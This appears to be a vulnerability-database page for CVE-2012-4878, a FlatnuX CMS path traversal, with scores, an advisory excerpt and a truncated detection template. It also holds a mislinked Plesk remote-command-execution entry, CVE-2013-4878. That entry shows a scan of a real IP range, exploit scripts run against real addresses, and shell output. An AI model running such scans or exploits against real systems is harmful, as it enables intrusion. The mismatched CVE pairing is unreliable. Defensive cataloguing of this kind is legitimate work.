CVE-2012-4878
published 2012-09-06CVE-2012-4878: Absolute path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname…
PriorityP338medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
8.76%
94.5th percentile
Absolute path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flatnux | flatnux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Plesk < 9.5.4 - Remote Command Execution
exploitdb·2013-06-05
CVE-2013-4878 Plesk < 9.5.4 - Remote Command Execution
Plesk
...
...
...
OK
Linux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24
19:50:48 MSD 2012 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
---
./pnscan -w"GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" 76.12.54.163/16 80
perl plesk-simple.pl 76.12.81.206
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 13:39:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
77
Linux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E
ST 2012 x86_64 x86_64 x86_64 GNU/Linux
3e
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
0
perl plesk-simple-ssl.pl (use HTTPS because HTTP gave an internal server error)
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2013 15:29:28 GMT
Server: Apache/2.0.
Exploit-DB
FlatnuX CMS - Traversal Arbitrary File Access
exploitdb·2012-04-01
CVE-2012-4878 FlatnuX CMS - Traversal Arbitrary File Access
FlatnuX CMS - Traversal Arbitrary File Access
---
source: https://www.securityfocus.com/bid/52846/info
Flatnux is prone to multiple security vulnerabilities:
1. An HTML-injection vulnerability
2. A cross-site request-forgery vulnerability
3. A directory-traversal vulnerability
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, obtain sensitive information, or control how the site is rendered to the user. Other attacks are also possible.
The following versions are vulnerable:
Flatnux 2011-08.09.2
Flatnux 2011-2012-01.03.3
Flatnux 2011-minimal-2012-01.03.3
Fncommerce 2010-08-09-no-db
Fncommerce 2010-08-09-no-sample-data
Fncommerce 2010-0
Nuclei
FlatnuX CMS - Directory Traversal
nuclei·CVSS 5.0
CVE-2012-4878 [MEDIUM] FlatnuX CMS - Directory Traversal
FlatnuX CMS - Directory Traversal
A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
Template:
id: CVE-2012-4878
info:
name: FlatnuX CMS - Directory Traversal
author: daffainfo
severity: medium
description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
impact: |
An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the directory
No writeups or analysis indexed.
http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.htmlhttp://www.securityfocus.com/bid/52846http://www.vulnerability-lab.com/get_content.php?id=487https://exchange.xforce.ibmcloud.com/vulnerabilities/74568http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.htmlhttp://www.securityfocus.com/bid/52846http://www.vulnerability-lab.com/get_content.php?id=487https://exchange.xforce.ibmcloud.com/vulnerabilities/74568
2012-09-06
Published